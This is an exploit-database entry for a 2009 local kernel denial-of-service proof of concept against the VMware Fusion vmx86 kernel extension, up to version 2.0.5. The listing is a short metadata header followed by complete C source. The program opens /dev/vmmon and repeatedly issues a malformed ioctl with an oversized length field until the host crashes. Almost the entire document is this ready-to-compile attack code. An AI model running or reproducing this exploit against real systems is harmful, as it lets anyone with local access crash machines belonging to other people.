VMWare Fusion <= 2.0.5 vmx86 kext local PoC

2009-10-02T00:00:00
ID 1337DAY-ID-8120
Type zdt
Reporter mu-b
Modified 2009-10-02T00:00:00

Description

Exploit for unknown platform in category local exploits

                                        
                                            ===========================================
VMWare Fusion <= 2.0.5 vmx86 kext local PoC
===========================================


# Title: VMWare Fusion <= 2.0.5 vmx86 kext local PoC
# CVE-ID: ()
# OSVDB-ID: ()
# Author: mu-b
# Published: 2009-10-02
# Verified: yes

view source
print?
/* vmware-pop.c
 *
 * VMware Fusion <= 2.0.5 vmx86 kext local denial of service POC
 * by mu-b - Mon 22 June 2009
 *
 * - Tested on: VMware Fusion 2.0.4 (10.5.x)
 *              VMware Fusion 2.0.5 (10.5.x)
 *
 * http://seclists.org/fulldisclosure/2009/Oct/29
 * http://lists.vmware.com/pipermail/security-announce/2009/000066.html
 *
 * - this exploit is provided for educational purposes _only_. You are free
 *   to use this code in any way you wish provided you do not work for, or
 *   are associated in any way with Portcullis Computer Security Ltd.
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs [email protected]$!
 */
 
#include <stdio.h>
#include <stdlib.h>
 
#include <fcntl.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
 
#define VMX86_IOCTL       0x80045643
 
struct ioctl_req {
  struct ioctl_req_buf *uaddr;
};
 
struct ioctl_req_buf {
  char pad[0x8];
  int len;
  char _pad[0xC];
};
 
int
main (int argc, char **argv)
{
  struct ioctl_req req;
  struct ioctl_req_buf buf;
  int fd, r;
 
  printf ("VMware Fusion <= 2.0.5 vmx86 kext local kernel denial of service PoC\n"
          "by: <[email protected]>\n"
          "http://www.digit-labs.org/ -- Digit-Labs [email protected]$!\n\n");
 
  fd = open ("/dev/vmmon", O_RDONLY);
  if (fd < 0)
    {
      fprintf (stderr, "%s: open failed\n", argv[0]);
      exit (EXIT_FAILURE);
    }
 
  memset (&req, 0, sizeof req);
  req.uaddr = &buf;
 
  memset (&buf, 0x41, sizeof buf);
  buf.len = 0xAAAAAAA;
 
  printf ("* hitting...\n");
  while (1)
    r = ioctl (fd, VMX86_IOCTL, &req);
 
  /* not reachable!$%! */
  return (EXIT_SUCCESS);
}




#  0day.today [2018-03-14]  #